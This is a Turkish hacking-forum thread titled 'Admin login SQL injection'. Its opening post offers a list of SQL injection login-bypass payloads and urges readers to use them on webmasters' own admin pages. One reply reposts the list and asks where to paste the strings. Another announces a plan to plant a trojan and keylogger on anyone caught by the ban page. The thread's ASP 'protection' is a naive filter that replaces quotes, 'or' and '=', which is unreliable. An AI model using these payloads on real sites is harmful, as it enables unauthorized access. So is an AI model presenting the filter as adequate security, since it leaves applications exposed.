Admin login SQL injection

MySouLNeedLove

MySouLNeedLove

New member
Katılım
9 Ara 2005
Mesajlar
825
Reaction score
0
Puanları
0
Yaş
37
Konum
Çalışıyorum
Genelde sitenin webmasterları tarafından kodlanan sistemlerde /admin.asp /admin/ gibi dizinlerde admin girişleri vardır aşağıdaki kodlarla sql enjection ile admin panelinden giriş yapabilirsiniz..

admin’--
’ or 0=0 --
" or 0=0 --
or 0=0 --
’ or 0=0 #
" or 0=0 #
or 0=0 #
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a
hi")or("a"="a

Korunmasıda kolaydır.

Mesela, zararsız hale getirmek için,

pass= request.form("pass")
pass = Replace(pass,"’","’’")
pass = Replace(pass,"or","*")
pass = Replace(pass,"=","*")

gibi etkisiz hale getirebilriisniz. YAda Kimin SQL injection yaptığını anlamak içinde,

If Instr(pass, "or") Then
Response.Redirect "ban.asp"
end if

gibi sql injeciton yapaanı, direk BAn atabilir. Bunlar tamamen ASP koddur. Mantık budur. İlkinde bazı karakterinlerin yerine başka bişler getiriiyoruz, YAni işlevini ortadan kaldırıyoz. Diğerinde ise, o karateri arıyoruz,VAr ise ban.asp ye gönder elemanı. Sonra IP sini öğren yada ne gerekiyorsa yap.
 
çok eski bi yöntem ama halla sql injeciton yiyen bir çok site mevcut
 
admin’--
’ or 0=0 --
" or 0=0 --
or 0=0 --
’ or 0=0 #
" or 0=0 #
or 0=0 #
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a


giris buldum peki bu kodlar nerye yapıscak?
 
If Instr(pass, "or") Then
Response.Redirect "ban.asp"
end if


bu olay hoşuma gitti
ben onu ban.asp ye yönlendircem içine de bilinmedik bi trojan var onu atacam bpk.exe yapıştırcam adamın pc ye keylogger'i uğraşsın dursunlar
zuhahha

tşk kanki
 
kardeş ben bundan bişey anlamadım. sql injektion ne?
 
Cevap yazmak için giriş yap yada kayıt ol.
Geri
Üst